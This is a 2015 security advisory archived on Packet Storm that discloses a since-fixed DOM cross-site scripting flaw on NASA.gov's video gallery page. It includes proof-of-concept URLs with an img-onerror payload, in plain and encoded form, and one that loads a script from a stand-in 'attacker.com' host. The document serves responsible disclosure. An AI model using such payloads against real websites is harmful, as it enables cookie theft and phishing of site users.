Twenty Year Anniversary

NASA.gov Cross Site Scripting

NASA.gov Cross Site Scripting
Posted Apr 1, 2015
Authored by Yann CAM

NASA.gov suffered from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 3f01be8803358f55b95e204b9006f9ad

NASA.gov Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: NASA.gov main-domain DOM-XSS
# Date: 01/04/2015
# Author: Yann CAM - Georges TAUPIN @ Synetis - ASafety
# Vendor or Software Link: www.nasa.gov
# Version: /
# Category: DOM-XSS
# Google dork:
# Tested on: NASA.gov main-domain
######################################################################

NASA description :
=======================================================================================

The National Aeronautics and Space Administration (NASA) is the United States government agency responsible for the civilian space program as well as
aeronautics and aerospace research.

There are several sub-domains and independent projects within NASA.
Those affected by this advisory are :

- NASA’s video gallery on main domain : DOM Cross-Site Scripting (RXSS)


Vulnerability description :
=======================================================================================
Reflected DOM XSS are available in nasa.gov main-domain above.
Through this kind of vulnerability, an attacker could tamper with page rendering, redirect victims to fake NASA portals, or capture NASA's users credentials such cookies.
These reflected XSS are on GET variables and are not properly sanitized before being used in page.


NASA’s main portal - video gallery - PoC :
=======================================================================================

- Proof of Concept (PoC), canonical DOM-XSS "alert()", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3Dalert(/RXSS/) />

or the same fully-url-encoded :

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%2f%52%58%53%53%2f%29%20%2f%3e

The previous link generates a JavaScript "alert()" box in the browser context.

- Proof of Concept (PoC), canonical DOM-XSS "loading third party JS script", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3D"var s%3Ddocument.createElement('script');s.setAttribute('src','http://attacker.com/x.js');document.getElementsByTagName('head').item(0).appendChild(s);" />


Screenshots :
=======================================================================================
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_001.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_003.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_004.png


Solution:
=======================================================================================

Fixed by NASA Portal's team.


Additional resources :
=======================================================================================

- http://www.nasa.gov/
- https://www.owasp.org/index.php/DOM_Based_XSS
- http://www.asafety.fr/vuln-exploit-poc/contribution-nasa-gov-portail-principal-dom-xss
- http://www.synetis.com


Report timeline :
=======================================================================================

2015-01-25 : NASA Portal's team was alerted by email through "contact form".
2015-01-26 : NASA Portal's team fixed the vulnerability
2015-04-01 : Public advisory

Credits :
=======================================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Yann CAM - Georges TAUPIN - Security Consultants @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr | www.georgestaupin.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    10 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close